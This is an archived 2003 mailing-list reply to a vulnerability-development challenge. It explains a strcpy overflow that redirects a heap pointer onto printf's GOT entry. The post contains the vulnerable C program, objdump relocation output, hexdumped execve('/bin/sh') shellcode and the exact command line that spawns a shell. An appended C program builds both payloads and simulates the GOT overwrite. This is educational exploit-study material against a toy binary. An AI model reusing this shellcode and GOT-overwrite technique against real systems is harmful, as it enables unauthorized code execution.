Pantek Library

Re: [Vuln-dev Challenge] Challenge #2

From: Jason_Royes <jroyes(at)da-experts.com>
Date: Sat May 24 2003 - 01:05:54 EDT

Strategy was to overwrite printf pointer with shellcode address.

  1. Overwrite the pointer held in bfp with strcpy(buf, argv[1]).

before:
[buf][bfp][ret]
after:
[buf][&printf - 2][ret]

Subtract 2 from the printf addr to compensate for ";;%s;;" in fprintf.

  2. Overwrite the printf function pointer with argv[2] via fgets(bfp, BFSIZE, f1); f1 contains the address of argv[1] or buf.

  3. printf is then called, which gives a shell.

Note that a BFSIZE of 90 actually allocates 92 bytes on the stack.

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcpy */

#define BFSIZE 90

int
main(int argc, char *argv[])
{

        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;
        /* debug */
        printf("bfp = %p, buf = %p\n", bfp, buf);

        /* log input */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        strcpy(buf, argv[1]);   /* unbounded: a long argv[1] runs past buf into bfp */

        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)     /* writes the logged line wherever bfp now points */
                return 1;

        printf("%s\n", bfp);    /* this call goes through printf's GOT slot */
        fclose(f1);
        exit(1);

}
##

jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2

vd2: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE

08049874 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_JUMP_SLOT   __register_frame_info
0804984c R_386_JUMP_SLOT   fprintf
08049850 R_386_JUMP_SLOT   malloc
08049854 R_386_JUMP_SLOT   __deregister_frame_info
08049858 R_386_JUMP_SLOT   fgets
0804985c R_386_JUMP_SLOT   __libc_start_main
08049860 R_386_JUMP_SLOT   printf
08049864 R_386_JUMP_SLOT   fclose
08049868 R_386_JUMP_SLOT   exit
0804986c R_386_JUMP_SLOT   fopen
08049870 R_386_JUMP_SLOT   strcpy

jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell

00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
00000020  d2 b0 0b cd 80                                    |.....|
00000025
jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"`
bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$
##

Thanks to sin for the tiny shellcode.

On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:

> 
> We are announcing the second challenge.  Initially, we wanted to have this
> out a few days ago but were involved in testing it on multiple platforms.
> This challenge is a little easier than the first one, since we'd like to
> see more people attempting to produce a proof-of-concept.  If you find it
> too easy, you're welcome to attempt it in an environment with a
> non-executable stack/heap to raise the bar a little.
> 
> Here's a link to the basic guidelines (for those who missed it):
> 
> http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0
> 
> (also, please retain the [Vuln-dev Challenge] string in the subject line
> for replies to make for easier filtering for those not interested in
> challenge related discussion.)
> 
> ---
> 
> /* vulndev2.c */
> 
> #include <stdio.h>
> #include <stdlib.h>
> 
> #define BFSIZE 90
> 
> int
> main(int argc, char *argv[])
> {
>         char    *bfp;
>         char    buf[BFSIZE];
>         FILE    *f1;
> 
>         if (argc != 3)
>                 return 1;
>         if ( (bfp = malloc(BFSIZE)) == NULL)
>                 return 1;
> 
>         /* log input */
>         if ( (f1 = fopen("db.log", "a+")) == NULL)
>                 return 1;
>         fprintf(f1, ";;%s;;", argv[2]);
>         fclose(f1);
> 
>         strcpy(buf, argv[1]);
> 
>         /* read log */
>         if ( (f1 = fopen("db.log", "r")) == NULL)
>                 return 1;
>         if (fgets(bfp, BFSIZE, f1) == NULL)
>                 return 1;
> 
>         printf("%s\n", bfp);
>         fclose(f1);
>         exit(1);
> }
> 
> ---
> 
> Dave McKinney
> Symantec
> 
> keyID: BF919DD7
> key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
-- 
Jason Royes
Data Access Experts
http://www.da-experts.com/
Received on Sat May 24 17:04:58 2003
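The following C program is an added example, not part of Jason's post or of the challenge code. It builds the two argv strings that the one-liner above produces and models the second stage against a small copy of the GOT, so the "subtract 2 for ;;" step and the NUL-free requirement on the payload can be checked without running vd2. The printf GOT slot (0x08049860), the buf address (0xbffffa6c), the 92-byte buf-to-bfp distance and the 37-byte shellcode are all taken from the output above; the sled/NUL checks, the GOT model region (0x08049848 onward, 48 bytes) and the function names are my own assumptions for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BFSIZE       90            /* the challenge's buffer size */
#define BFP_OFFSET   92            /* bytes from buf to bfp: 90 padded to 92, per the post */
#define PRINTF_GOT   0x08049860u   /* R_386_JUMP_SLOT printf, from objdump -R above */
#define BUF_ADDR     0xbffffa6cu   /* "buf = 0xbffffa6c" from the debug printf above */
#define LOG_PREFIX   ";;"          /* fprintf(f1, ";;%s;;", argv[2]) wraps argv[2] in these */
#define LOG_SUFFIX   ";;"
#define GOT_BASE     0x08049848u   /* first JUMP_SLOT in the objdump output (assumed model base) */
#define GOT_MODEL_SZ 0x30          /* model covers 0x08049848..0x08049877 */

/* sin's 37-byte execve("/bin/sh") shellcode, as hexdumped on the page */
static const unsigned char tiny_shell[37] = {
    0x31,0xdb,0x31,0xc9,0xb0,0x46,0xcd,0x80,0x31,0xc0,0x50,0x68,0x2f,0x73,0x68,0xff,
    0x88,0x44,0x24,0x03,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0x31,
    0xd2,0xb0,0x0b,0xcd,0x80
};

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff;         p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Stage 1, argv[1]: ['A' sled][shellcode][&printf_GOT - strlen(";;")].
 * strcpy stops at the first NUL, so a payload containing one is rejected.
 * Returns the payload length (NUL-terminated in out), or 0 on failure. */
size_t build_argv1(unsigned char *out, size_t outsz,
                   const unsigned char *sc, size_t sclen)
{
    size_t total = BFP_OFFSET + 4;
    if (sclen > BFP_OFFSET || outsz < total + 1)
        return 0;
    memset(out, 'A', BFP_OFFSET - sclen);          /* 0x41 = inc ecx: a harmless sled */
    memcpy(out + BFP_OFFSET - sclen, sc, sclen);
    put_le32(out + BFP_OFFSET, PRINTF_GOT - (uint32_t)strlen(LOG_PREFIX));
    out[total] = '\0';
    return memchr(out, 0, total) ? 0 : total;
}

/* Stage 2, argv[2]: the address fgets will land in printf's GOT slot.
 * The post points it at buf, so the sled runs into the shellcode. */
size_t build_argv2(unsigned char *out, size_t outsz)
{
    if (outsz < 5)
        return 0;
    put_le32(out, BUF_ADDR);
    out[4] = '\0';
    return memchr(out, 0, 4) ? 0 : 4;
}

/* Model of fgets(bfp, BFSIZE, f1) over a small copy of the GOT: the log line
 * ";;" + argv[2] + ";;" plus fgets' terminating NUL is written at the
 * overwritten bfp. Returns the value left in printf's slot, i.e. what the
 * final printf("%s\n", bfp) will actually call (0 if outside the model). */
uint32_t simulate_stage2(uint32_t bfp_value, const unsigned char *argv2, size_t argv2len)
{
    unsigned char got[GOT_MODEL_SZ];
    unsigned char line[BFSIZE];
    size_t n = 0;

    if (argv2len > BFSIZE - 1 - strlen(LOG_PREFIX) - strlen(LOG_SUFFIX))
        return 0;                               /* model only handles lines that fit */
    memset(got, 0xcc, sizeof got);
    memcpy(line + n, LOG_PREFIX, strlen(LOG_PREFIX)); n += strlen(LOG_PREFIX);
    memcpy(line + n, argv2, argv2len);                n += argv2len;
    memcpy(line + n, LOG_SUFFIX, strlen(LOG_SUFFIX)); n += strlen(LOG_SUFFIX);
    line[n] = '\0';

    if (bfp_value < GOT_BASE || bfp_value - GOT_BASE + n + 1 > sizeof got)
        return 0;
    memcpy(got + (bfp_value - GOT_BASE), line, n + 1);
    return get_le32(got + (PRINTF_GOT - GOT_BASE));
}

int main(void)
{
    unsigned char a1[128], a2[8];
    size_t n1 = build_argv1(a1, sizeof a1, tiny_shell, sizeof tiny_shell);
    size_t n2 = build_argv2(a2, sizeof a2);
    if (!n1 || !n2) { fputs("payload contains NUL\n", stderr); return 1; }
    printf("argv[1]: %zu bytes, bfp <- 0x%08x\n", n1, get_le32(a1 + BFP_OFFSET));
    printf("with the -2 compensation, printf slot = 0x%08x\n",
           simulate_stage2(PRINTF_GOT - 2, a2, n2));
    printf("without it,               printf slot = 0x%08x\n",
           simulate_stage2(PRINTF_GOT, a2, n2));
    return 0;
}
```

Running it shows why the -2 matters: with bfp pointing two bytes before the slot, the ";;" prefix lands in the bytes below it and the slot receives 0xbffffa6c; with bfp pointing at the slot itself, the slot ends up as ";;" followed by the first two bytes of the address, which is not a usable pointer.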

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT
